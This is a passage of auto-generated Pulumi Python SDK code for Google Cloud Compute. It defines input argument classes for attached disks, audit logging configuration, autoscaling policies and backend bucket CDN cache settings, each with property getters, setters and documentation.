def mode(self) -> Optional[pulumi.Input['AttachedDiskMode']]:
"""
The mode in which to attach this disk, either READ_WRITE or READ_ONLY. If not specified, the default is to attach the disk in READ_WRITE mode.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input['AttachedDiskMode']]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a valid partial or full URL to an existing Persistent Disk resource. When creating a new instance, one of initializeParams.sourceImage or initializeParams.sourceSnapshot or disks.source is required except for local SSD. If desired, you can also attach existing non-root persistent disks using this property. This field is only applicable for persistent disks. Note that for InstanceTemplate, specify the disk name for zonal disk, and the URL for regional disk.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['AttachedDiskType']]:
"""
Specifies the type of the disk, either SCRATCH or PERSISTENT. If not specified, the default is PERSISTENT.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['AttachedDiskType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class AuditConfigArgs:
def __init__(__self__, *,
audit_log_configs: Optional[pulumi.Input[Sequence[pulumi.Input['AuditLogConfigArgs']]]] = None,
exempted_members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None):
"""
Specifies the audit configuration for a service. The configuration determines which permission types are logged, and what identities, if any, are exempted from logging. An AuditConfig must have one or more AuditLogConfigs. If there are AuditConfigs for both `allServices` and a specific service, the union of the two AuditConfigs is used for that service: the log_types specified in each AuditConfig are enabled, and the exempted_members in each AuditLogConfig are exempted. Example Policy with multiple AuditConfigs: { "audit_configs": [ { "service": "allServices", "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" }, { "log_type": "ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com", "audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type": "DATA_WRITE", "exempted_members": [ "user:aliya@example.com" ] } ] } ] } For sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also exempts jose@example.com from DATA_READ logging, and aliya@example.com from DATA_WRITE logging.
:param pulumi.Input[Sequence[pulumi.Input['AuditLogConfigArgs']]] audit_log_configs: The configuration for logging of each type of permission.
:param pulumi.Input[Sequence[pulumi.Input[str]]] exempted_members: This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] service: Specifies a service that will be enabled for audit logging. For example, `storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special value that covers all services.
"""
if audit_log_configs is not None:
pulumi.set(__self__, "audit_log_configs", audit_log_configs)
if exempted_members is not None:
pulumi.set(__self__, "exempted_members", exempted_members)
if service is not None:
pulumi.set(__self__, "service", service)
@property
@pulumi.getter(name="auditLogConfigs")
def audit_log_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuditLogConfigArgs']]]]:
"""
The configuration for logging of each type of permission.
"""
return pulumi.get(self, "audit_log_configs")
@audit_log_configs.setter
def audit_log_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AuditLogConfigArgs']]]]):
pulumi.set(self, "audit_log_configs", value)
@property
@pulumi.getter(name="exemptedMembers")
def exempted_members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "exempted_members")
@exempted_members.setter
def exempted_members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "exempted_members", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a service that will be enabled for audit logging. For example, `storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special value that covers all services.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@pulumi.input_type
class AuditLogConfigArgs:
def __init__(__self__, *,
exempted_members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ignore_child_exemptions: Optional[pulumi.Input[bool]] = None,
log_type: Optional[pulumi.Input['AuditLogConfigLogType']] = None):
"""
Provides the configuration for logging a type of permissions. Example: { "audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [ "user:jose@example.com" ] }, { "log_type": "DATA_WRITE" } ] } This enables 'DATA_READ' and 'DATA_WRITE' logging, while exempting jose@example.com from DATA_READ logging.
:param pulumi.Input[Sequence[pulumi.Input[str]]] exempted_members: Specifies the identities that do not cause logging for this type of permission. Follows the same format of Binding.members.
:param pulumi.Input[bool] ignore_child_exemptions: This is deprecated and has no effect. Do not use.
:param pulumi.Input['AuditLogConfigLogType'] log_type: The log type that this config enables.
"""
if exempted_members is not None:
pulumi.set(__self__, "exempted_members", exempted_members)
if ignore_child_exemptions is not None:
pulumi.set(__self__, "ignore_child_exemptions", ignore_child_exemptions)
if log_type is not None:
pulumi.set(__self__, "log_type", log_type)
@property
@pulumi.getter(name="exemptedMembers")
def exempted_members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the identities that do not cause logging for this type of permission. Follows the same format of Binding.members.
"""
return pulumi.get(self, "exempted_members")
@exempted_members.setter
def exempted_members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "exempted_members", value)
@property
@pulumi.getter(name="ignoreChildExemptions")
def ignore_child_exemptions(self) -> Optional[pulumi.Input[bool]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "ignore_child_exemptions")
@ignore_child_exemptions.setter
def ignore_child_exemptions(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_child_exemptions", value)
@property
@pulumi.getter(name="logType")
def log_type(self) -> Optional[pulumi.Input['AuditLogConfigLogType']]:
"""
The log type that this config enables.
"""
return pulumi.get(self, "log_type")
@log_type.setter
def log_type(self, value: Optional[pulumi.Input['AuditLogConfigLogType']]):
pulumi.set(self, "log_type", value)
@pulumi.input_type
class AuthorizationLoggingOptionsArgs:
def __init__(__self__, *,
permission_type: Optional[pulumi.Input['AuthorizationLoggingOptionsPermissionType']] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input['AuthorizationLoggingOptionsPermissionType'] permission_type: This is deprecated and has no effect. Do not use.
"""
if permission_type is not None:
pulumi.set(__self__, "permission_type", permission_type)
@property
@pulumi.getter(name="permissionType")
def permission_type(self) -> Optional[pulumi.Input['AuthorizationLoggingOptionsPermissionType']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "permission_type")
@permission_type.setter
def permission_type(self, value: Optional[pulumi.Input['AuthorizationLoggingOptionsPermissionType']]):
pulumi.set(self, "permission_type", value)
@pulumi.input_type
class AutoscalingPolicyCpuUtilizationArgs:
def __init__(__self__, *,
predictive_method: Optional[pulumi.Input['AutoscalingPolicyCpuUtilizationPredictiveMethod']] = None,
utilization_target: Optional[pulumi.Input[float]] = None):
"""
CPU utilization policy.
:param pulumi.Input['AutoscalingPolicyCpuUtilizationPredictiveMethod'] predictive_method: Indicates whether predictive autoscaling based on CPU metric is enabled. Valid values are: * NONE (default). No predictive method is used. The autoscaler scales the group to meet current demand based on real-time metrics. * OPTIMIZE_AVAILABILITY. Predictive autoscaling improves availability by monitoring daily and weekly load patterns and scaling out ahead of anticipated demand.
:param pulumi.Input[float] utilization_target: The target CPU utilization that the autoscaler maintains. Must be a float value in the range (0, 1]. If not specified, the default is 0.6. If the CPU level is below the target utilization, the autoscaler scales in the number of instances until it reaches the minimum number of instances you specified or until the average CPU of your instances reaches the target utilization. If the average CPU is above the target utilization, the autoscaler scales out until it reaches the maximum number of instances you specified or until the average utilization reaches the target utilization.
"""
if predictive_method is not None:
pulumi.set(__self__, "predictive_method", predictive_method)
if utilization_target is not None:
pulumi.set(__self__, "utilization_target", utilization_target)
@property
@pulumi.getter(name="predictiveMethod")
def predictive_method(self) -> Optional[pulumi.Input['AutoscalingPolicyCpuUtilizationPredictiveMethod']]:
"""
Indicates whether predictive autoscaling based on CPU metric is enabled. Valid values are: * NONE (default). No predictive method is used. The autoscaler scales the group to meet current demand based on real-time metrics. * OPTIMIZE_AVAILABILITY. Predictive autoscaling improves availability by monitoring daily and weekly load patterns and scaling out ahead of anticipated demand.
"""
return pulumi.get(self, "predictive_method")
@predictive_method.setter
def predictive_method(self, value: Optional[pulumi.Input['AutoscalingPolicyCpuUtilizationPredictiveMethod']]):
pulumi.set(self, "predictive_method", value)
@property
@pulumi.getter(name="utilizationTarget")
def utilization_target(self) -> Optional[pulumi.Input[float]]:
"""
The target CPU utilization that the autoscaler maintains. Must be a float value in the range (0, 1]. If not specified, the default is 0.6. If the CPU level is below the target utilization, the autoscaler scales in the number of instances until it reaches the minimum number of instances you specified or until the average CPU of your instances reaches the target utilization. If the average CPU is above the target utilization, the autoscaler scales out until it reaches the maximum number of instances you specified or until the average utilization reaches the target utilization.
"""
return pulumi.get(self, "utilization_target")
@utilization_target.setter
def utilization_target(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "utilization_target", value)
@pulumi.input_type
class AutoscalingPolicyCustomMetricUtilizationArgs:
def __init__(__self__, *,
filter: Optional[pulumi.Input[str]] = None,
metric: Optional[pulumi.Input[str]] = None,
single_instance_assignment: Optional[pulumi.Input[float]] = None,
utilization_target: Optional[pulumi.Input[float]] = None,
utilization_target_type: Optional[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationUtilizationTargetType']] = None):
"""
Custom utilization metric policy.
:param pulumi.Input[str] filter: A filter string, compatible with a Stackdriver Monitoring filter string for TimeSeries.list API call. This filter is used to select a specific TimeSeries for the purpose of autoscaling and to determine whether the metric is exporting per-instance or per-group data. For the filter to be valid for autoscaling purposes, the following rules apply: - You can only use the AND operator for joining selectors. - You can only use direct equality comparison operator (=) without any functions for each selector. - You can specify the metric in both the filter string and in the metric field. However, if specified in both places, the metric must be identical. - The monitored resource type determines what kind of values are expected for the metric. If it is a gce_instance, the autoscaler expects the metric to include a separate TimeSeries for each instance in a group. In such a case, you cannot filter on resource labels. If the resource type is any other value, the autoscaler expects this metric to contain values that apply to the entire autoscaled instance group and resource label filtering can be performed to point autoscaler at the correct TimeSeries to scale upon. This is called a *per-group metric* for the purpose of autoscaling. If not specified, the type defaults to gce_instance. Try to provide a filter that is selective enough to pick just one TimeSeries for the autoscaled group or for each of the instances (if you are using gce_instance resource type). If multiple TimeSeries are returned upon the query execution, the autoscaler will sum their respective values to obtain its scaling value.
:param pulumi.Input[str] metric: The identifier (type) of the Stackdriver Monitoring metric. The metric cannot have negative values. The metric must have a value type of INT64 or DOUBLE.
:param pulumi.Input[float] single_instance_assignment: If scaling is based on a per-group metric value that represents the total amount of work to be done or resource usage, set this value to an amount assigned for a single instance of the scaled group. Autoscaler keeps the number of instances proportional to the value of this metric. The metric itself does not change value due to group resizing. A good metric to use with the target is for example pubsub.googleapis.com/subscription/num_undelivered_messages or a custom metric exporting the total number of requests coming to your instances. A bad example would be a metric exporting an average or median latency, since this value can't include a chunk assignable to a single instance, it could be better used with utilization_target instead.
:param pulumi.Input[float] utilization_target: The target value of the metric that autoscaler maintains. This must be a positive value. A utilization metric scales number of virtual machines handling requests to increase or decrease proportionally to the metric. For example, a good metric to use as a utilization_target is https://www.googleapis.com/compute/v1/instance/network/received_bytes_count. The autoscaler works to keep this value constant for each of the instances.
:param pulumi.Input['AutoscalingPolicyCustomMetricUtilizationUtilizationTargetType'] utilization_target_type: Defines how target utilization value is expressed for a Stackdriver Monitoring metric. Either GAUGE, DELTA_PER_SECOND, or DELTA_PER_MINUTE.
"""
if filter is not None:
pulumi.set(__self__, "filter", filter)
if metric is not None:
pulumi.set(__self__, "metric", metric)
if single_instance_assignment is not None:
pulumi.set(__self__, "single_instance_assignment", single_instance_assignment)
if utilization_target is not None:
pulumi.set(__self__, "utilization_target", utilization_target)
if utilization_target_type is not None:
pulumi.set(__self__, "utilization_target_type", utilization_target_type)
@property
@pulumi.getter
def filter(self) -> Optional[pulumi.Input[str]]:
"""
A filter string, compatible with a Stackdriver Monitoring filter string for TimeSeries.list API call. This filter is used to select a specific TimeSeries for the purpose of autoscaling and to determine whether the metric is exporting per-instance or per-group data. For the filter to be valid for autoscaling purposes, the following rules apply: - You can only use the AND operator for joining selectors. - You can only use direct equality comparison operator (=) without any functions for each selector. - You can specify the metric in both the filter string and in the metric field. However, if specified in both places, the metric must be identical. - The monitored resource type determines what kind of values are expected for the metric. If it is a gce_instance, the autoscaler expects the metric to include a separate TimeSeries for each instance in a group. In such a case, you cannot filter on resource labels. If the resource type is any other value, the autoscaler expects this metric to contain values that apply to the entire autoscaled instance group and resource label filtering can be performed to point autoscaler at the correct TimeSeries to scale upon. This is called a *per-group metric* for the purpose of autoscaling. If not specified, the type defaults to gce_instance. Try to provide a filter that is selective enough to pick just one TimeSeries for the autoscaled group or for each of the instances (if you are using gce_instance resource type). If multiple TimeSeries are returned upon the query execution, the autoscaler will sum their respective values to obtain its scaling value.
"""
return pulumi.get(self, "filter")
@filter.setter
def filter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter", value)
@property
@pulumi.getter
def metric(self) -> Optional[pulumi.Input[str]]:
"""
The identifier (type) of the Stackdriver Monitoring metric. The metric cannot have negative values. The metric must have a value type of INT64 or DOUBLE.
"""
return pulumi.get(self, "metric")
@metric.setter
def metric(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metric", value)
@property
@pulumi.getter(name="singleInstanceAssignment")
def single_instance_assignment(self) -> Optional[pulumi.Input[float]]:
"""
If scaling is based on a per-group metric value that represents the total amount of work to be done or resource usage, set this value to an amount assigned for a single instance of the scaled group. Autoscaler keeps the number of instances proportional to the value of this metric. The metric itself does not change value due to group resizing. A good metric to use with the target is for example pubsub.googleapis.com/subscription/num_undelivered_messages or a custom metric exporting the total number of requests coming to your instances. A bad example would be a metric exporting an average or median latency, since this value can't include a chunk assignable to a single instance, it could be better used with utilization_target instead.
"""
return pulumi.get(self, "single_instance_assignment")
@single_instance_assignment.setter
def single_instance_assignment(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "single_instance_assignment", value)
@property
@pulumi.getter(name="utilizationTarget")
def utilization_target(self) -> Optional[pulumi.Input[float]]:
"""
The target value of the metric that autoscaler maintains. This must be a positive value. A utilization metric scales number of virtual machines handling requests to increase or decrease proportionally to the metric. For example, a good metric to use as a utilization_target is https://www.googleapis.com/compute/v1/instance/network/received_bytes_count. The autoscaler works to keep this value constant for each of the instances.
"""
return pulumi.get(self, "utilization_target")
@utilization_target.setter
def utilization_target(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "utilization_target", value)
@property
@pulumi.getter(name="utilizationTargetType")
def utilization_target_type(self) -> Optional[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationUtilizationTargetType']]:
"""
Defines how target utilization value is expressed for a Stackdriver Monitoring metric. Either GAUGE, DELTA_PER_SECOND, or DELTA_PER_MINUTE.
"""
return pulumi.get(self, "utilization_target_type")
@utilization_target_type.setter
def utilization_target_type(self, value: Optional[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationUtilizationTargetType']]):
pulumi.set(self, "utilization_target_type", value)
@pulumi.input_type
class AutoscalingPolicyLoadBalancingUtilizationArgs:
def __init__(__self__, *,
utilization_target: Optional[pulumi.Input[float]] = None):
"""
Configuration parameters of autoscaling based on load balancing.
:param pulumi.Input[float] utilization_target: Fraction of backend capacity utilization (set in HTTP(S) load balancing configuration) that the autoscaler maintains. Must be a positive float value. If not defined, the default is 0.8.
"""
if utilization_target is not None:
pulumi.set(__self__, "utilization_target", utilization_target)
@property
@pulumi.getter(name="utilizationTarget")
def utilization_target(self) -> Optional[pulumi.Input[float]]:
"""
Fraction of backend capacity utilization (set in HTTP(S) load balancing configuration) that the autoscaler maintains. Must be a positive float value. If not defined, the default is 0.8.
"""
return pulumi.get(self, "utilization_target")
@utilization_target.setter
def utilization_target(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "utilization_target", value)
@pulumi.input_type
class AutoscalingPolicyScaleDownControlArgs:
def __init__(__self__, *,
max_scaled_down_replicas: Optional[pulumi.Input['FixedOrPercentArgs']] = None,
time_window_sec: Optional[pulumi.Input[int]] = None):
"""
Configuration that allows for slower scale in so that even if Autoscaler recommends an abrupt scale in of a MIG, it will be throttled as specified by the parameters below.
:param pulumi.Input['FixedOrPercentArgs'] max_scaled_down_replicas: Maximum allowed number (or %) of VMs that can be deducted from the peak recommendation during the window autoscaler looks at when computing recommendations. Possibly all these VMs can be deleted at once so user service needs to be prepared to lose that many VMs in one step.
:param pulumi.Input[int] time_window_sec: How far back autoscaling looks when computing recommendations to include directives regarding slower scale in, as described above.
"""
if max_scaled_down_replicas is not None:
pulumi.set(__self__, "max_scaled_down_replicas", max_scaled_down_replicas)
if time_window_sec is not None:
pulumi.set(__self__, "time_window_sec", time_window_sec)
@property
@pulumi.getter(name="maxScaledDownReplicas")
def max_scaled_down_replicas(self) -> Optional[pulumi.Input['FixedOrPercentArgs']]:
"""
Maximum allowed number (or %) of VMs that can be deducted from the peak recommendation during the window autoscaler looks at when computing recommendations. Possibly all these VMs can be deleted at once so user service needs to be prepared to lose that many VMs in one step.
"""
return pulumi.get(self, "max_scaled_down_replicas")
@max_scaled_down_replicas.setter
def max_scaled_down_replicas(self, value: Optional[pulumi.Input['FixedOrPercentArgs']]):
pulumi.set(self, "max_scaled_down_replicas", value)
@property
@pulumi.getter(name="timeWindowSec")
def time_window_sec(self) -> Optional[pulumi.Input[int]]:
"""
How far back autoscaling looks when computing recommendations to include directives regarding slower scale in, as described above.
"""
return pulumi.get(self, "time_window_sec")
@time_window_sec.setter
def time_window_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_window_sec", value)
@pulumi.input_type
class AutoscalingPolicyScaleInControlArgs:
def __init__(__self__, *,
max_scaled_in_replicas: Optional[pulumi.Input['FixedOrPercentArgs']] = None,
time_window_sec: Optional[pulumi.Input[int]] = None):
"""
Configuration that allows for slower scale in so that even if Autoscaler recommends an abrupt scale in of a MIG, it will be throttled as specified by the parameters below.
:param pulumi.Input['FixedOrPercentArgs'] max_scaled_in_replicas: Maximum allowed number (or %) of VMs that can be deducted from the peak recommendation during the window autoscaler looks at when computing recommendations. Possibly all these VMs can be deleted at once so user service needs to be prepared to lose that many VMs in one step.
:param pulumi.Input[int] time_window_sec: How far back autoscaling looks when computing recommendations to include directives regarding slower scale in, as described above.
"""
if max_scaled_in_replicas is not None:
pulumi.set(__self__, "max_scaled_in_replicas", max_scaled_in_replicas)
if time_window_sec is not None:
pulumi.set(__self__, "time_window_sec", time_window_sec)
@property
@pulumi.getter(name="maxScaledInReplicas")
def max_scaled_in_replicas(self) -> Optional[pulumi.Input['FixedOrPercentArgs']]:
"""
Maximum allowed number (or %) of VMs that can be deducted from the peak recommendation during the window autoscaler looks at when computing recommendations. Possibly all these VMs can be deleted at once so user service needs to be prepared to lose that many VMs in one step.
"""
return pulumi.get(self, "max_scaled_in_replicas")
@max_scaled_in_replicas.setter
def max_scaled_in_replicas(self, value: Optional[pulumi.Input['FixedOrPercentArgs']]):
pulumi.set(self, "max_scaled_in_replicas", value)
@property
@pulumi.getter(name="timeWindowSec")
def time_window_sec(self) -> Optional[pulumi.Input[int]]:
"""
How far back autoscaling looks when computing recommendations to include directives regarding slower scale in, as described above.
"""
return pulumi.get(self, "time_window_sec")
@time_window_sec.setter
def time_window_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_window_sec", value)
@pulumi.input_type
class AutoscalingPolicyArgs:
def __init__(__self__, *,
cool_down_period_sec: Optional[pulumi.Input[int]] = None,
cpu_utilization: Optional[pulumi.Input['AutoscalingPolicyCpuUtilizationArgs']] = None,
custom_metric_utilizations: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationArgs']]]] = None,
load_balancing_utilization: Optional[pulumi.Input['AutoscalingPolicyLoadBalancingUtilizationArgs']] = None,
max_num_replicas: Optional[pulumi.Input[int]] = None,
min_num_replicas: Optional[pulumi.Input[int]] = None,
mode: Optional[pulumi.Input['AutoscalingPolicyMode']] = None,
scale_down_control: Optional[pulumi.Input['AutoscalingPolicyScaleDownControlArgs']] = None,
scale_in_control: Optional[pulumi.Input['AutoscalingPolicyScaleInControlArgs']] = None,
scaling_schedules: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Cloud Autoscaler policy.
:param pulumi.Input[int] cool_down_period_sec: The number of seconds that the autoscaler waits before it starts collecting information from a new instance. This prevents the autoscaler from collecting information when the instance is initializing, during which the collected usage would not be reliable. The default time autoscaler waits is 60 seconds. Virtual machine initialization times might vary because of numerous factors. We recommend that you test how long an instance may take to initialize. To do this, create an instance and time the startup process.
:param pulumi.Input['AutoscalingPolicyCpuUtilizationArgs'] cpu_utilization: Defines the CPU utilization policy that allows the autoscaler to scale based on the average CPU utilization of a managed instance group.
:param pulumi.Input[Sequence[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationArgs']]] custom_metric_utilizations: Configuration parameters of autoscaling based on a custom metric.
:param pulumi.Input['AutoscalingPolicyLoadBalancingUtilizationArgs'] load_balancing_utilization: Configuration parameters of autoscaling based on load balancer.
:param pulumi.Input[int] max_num_replicas: The maximum number of instances that the autoscaler can scale out to. This is required when creating or updating an autoscaler. The maximum number of replicas must not be lower than minimal number of replicas.
:param pulumi.Input[int] min_num_replicas: The minimum number of replicas that the autoscaler can scale in to. This cannot be less than 0. If not provided, autoscaler chooses a default value depending on maximum number of instances allowed.
:param pulumi.Input['AutoscalingPolicyMode'] mode: Defines operating mode for this policy.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] scaling_schedules: Scaling schedules defined for an autoscaler. Multiple schedules can be set on an autoscaler, and they can overlap. During overlapping periods the greatest min_required_replicas of all scaling schedules is applied. Up to 128 scaling schedules are allowed.
"""
if cool_down_period_sec is not None:
pulumi.set(__self__, "cool_down_period_sec", cool_down_period_sec)
if cpu_utilization is not None:
pulumi.set(__self__, "cpu_utilization", cpu_utilization)
if custom_metric_utilizations is not None:
pulumi.set(__self__, "custom_metric_utilizations", custom_metric_utilizations)
if load_balancing_utilization is not None:
pulumi.set(__self__, "load_balancing_utilization", load_balancing_utilization)
if max_num_replicas is not None:
pulumi.set(__self__, "max_num_replicas", max_num_replicas)
if min_num_replicas is not None:
pulumi.set(__self__, "min_num_replicas", min_num_replicas)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if scale_down_control is not None:
pulumi.set(__self__, "scale_down_control", scale_down_control)
if scale_in_control is not None:
pulumi.set(__self__, "scale_in_control", scale_in_control)
if scaling_schedules is not None:
pulumi.set(__self__, "scaling_schedules", scaling_schedules)
@property
@pulumi.getter(name="coolDownPeriodSec")
def cool_down_period_sec(self) -> Optional[pulumi.Input[int]]:
"""
The number of seconds that the autoscaler waits before it starts collecting information from a new instance. This prevents the autoscaler from collecting information when the instance is initializing, during which the collected usage would not be reliable. The default time autoscaler waits is 60 seconds. Virtual machine initialization times might vary because of numerous factors. We recommend that you test how long an instance may take to initialize. To do this, create an instance and time the startup process.
"""
return pulumi.get(self, "cool_down_period_sec")
@cool_down_period_sec.setter
def cool_down_period_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cool_down_period_sec", value)
@property
@pulumi.getter(name="cpuUtilization")
def cpu_utilization(self) -> Optional[pulumi.Input['AutoscalingPolicyCpuUtilizationArgs']]:
"""
Defines the CPU utilization policy that allows the autoscaler to scale based on the average CPU utilization of a managed instance group.
"""
return pulumi.get(self, "cpu_utilization")
@cpu_utilization.setter
def cpu_utilization(self, value: Optional[pulumi.Input['AutoscalingPolicyCpuUtilizationArgs']]):
pulumi.set(self, "cpu_utilization", value)
@property
@pulumi.getter(name="customMetricUtilizations")
def custom_metric_utilizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationArgs']]]]:
"""
Configuration parameters of autoscaling based on a custom metric.
"""
return pulumi.get(self, "custom_metric_utilizations")
@custom_metric_utilizations.setter
def custom_metric_utilizations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingPolicyCustomMetricUtilizationArgs']]]]):
pulumi.set(self, "custom_metric_utilizations", value)
@property
@pulumi.getter(name="loadBalancingUtilization")
def load_balancing_utilization(self) -> Optional[pulumi.Input['AutoscalingPolicyLoadBalancingUtilizationArgs']]:
"""
Configuration parameters of autoscaling based on load balancer.
"""
return pulumi.get(self, "load_balancing_utilization")
@load_balancing_utilization.setter
def load_balancing_utilization(self, value: Optional[pulumi.Input['AutoscalingPolicyLoadBalancingUtilizationArgs']]):
pulumi.set(self, "load_balancing_utilization", value)
@property
@pulumi.getter(name="maxNumReplicas")
def max_num_replicas(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of instances that the autoscaler can scale out to. This is required when creating or updating an autoscaler. The maximum number of replicas must not be lower than minimal number of replicas.
"""
return pulumi.get(self, "max_num_replicas")
@max_num_replicas.setter
def max_num_replicas(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_num_replicas", value)
@property
@pulumi.getter(name="minNumReplicas")
def min_num_replicas(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of replicas that the autoscaler can scale in to. This cannot be less than 0. If not provided, autoscaler chooses a default value depending on maximum number of instances allowed.
"""
return pulumi.get(self, "min_num_replicas")
@min_num_replicas.setter
def min_num_replicas(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_num_replicas", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input['AutoscalingPolicyMode']]:
"""
Defines operating mode for this policy.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input['AutoscalingPolicyMode']]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter(name="scaleDownControl")
def scale_down_control(self) -> Optional[pulumi.Input['AutoscalingPolicyScaleDownControlArgs']]:
return pulumi.get(self, "scale_down_control")
@scale_down_control.setter
def scale_down_control(self, value: Optional[pulumi.Input['AutoscalingPolicyScaleDownControlArgs']]):
pulumi.set(self, "scale_down_control", value)
@property
@pulumi.getter(name="scaleInControl")
def scale_in_control(self) -> Optional[pulumi.Input['AutoscalingPolicyScaleInControlArgs']]:
return pulumi.get(self, "scale_in_control")
@scale_in_control.setter
def scale_in_control(self, value: Optional[pulumi.Input['AutoscalingPolicyScaleInControlArgs']]):
pulumi.set(self, "scale_in_control", value)
@property
@pulumi.getter(name="scalingSchedules")
def scaling_schedules(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Scaling schedules defined for an autoscaler. Multiple schedules can be set on an autoscaler, and they can overlap. During overlapping periods the greatest min_required_replicas of all scaling schedules is applied. Up to 128 scaling schedules are allowed.
"""
return pulumi.get(self, "scaling_schedules")
@scaling_schedules.setter
def scaling_schedules(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "scaling_schedules", value)
@pulumi.input_type
class BackendBucketCdnPolicyBypassCacheOnRequestHeaderArgs:
def __init__(__self__, *,
header_name: Optional[pulumi.Input[str]] = None):
"""
Bypass the cache when the specified request headers are present, e.g. Pragma or Authorization headers. Values are case insensitive. The presence of such a header overrides the cache_mode setting.
:param pulumi.Input[str] header_name: The header field name to match on when bypassing cache. Values are case-insensitive.
"""
if header_name is not None:
pulumi.set(__self__, "header_name", header_name)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> Optional[pulumi.Input[str]]:
"""
The header field name to match on when bypassing cache. Values are case-insensitive.
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_name", value)
@pulumi.input_type
class BackendBucketCdnPolicyCacheKeyPolicyArgs:
def __init__(__self__, *,
include_http_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
query_string_whitelist: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Message containing what to include in the cache key for a request for Cloud CDN.
:param pulumi.Input[Sequence[pulumi.Input[str]]] include_http_headers: Allows HTTP request headers (by name) to be used in the cache key.
:param pulumi.Input[Sequence[pulumi.Input[str]]] query_string_whitelist: Names of query string parameters to include in cache keys. All other parameters will be excluded. '&' and '=' will be percent encoded and not treated as delimiters.
"""
if include_http_headers is not None:
pulumi.set(__self__, "include_http_headers", include_http_headers)
if query_string_whitelist is not None:
pulumi.set(__self__, "query_string_whitelist", query_string_whitelist)
@property
@pulumi.getter(name="includeHttpHeaders")
def include_http_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allows HTTP request headers (by name) to be used in the cache key.
"""
return pulumi.get(self, "include_http_headers")
@include_http_headers.setter
def include_http_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "include_http_headers", value)
@property
@pulumi.getter(name="queryStringWhitelist")
def query_string_whitelist(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Names of query string parameters to include in cache keys. All other parameters will be excluded. '&' and '=' will be percent encoded and not treated as delimiters.
"""
return pulumi.get(self, "query_string_whitelist")
@query_string_whitelist.setter
def query_string_whitelist(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "query_string_whitelist", value)
@pulumi.input_type
class BackendBucketCdnPolicyNegativeCachingPolicyArgs:
def __init__(__self__, *,
code: Optional[pulumi.Input[int]] = None,
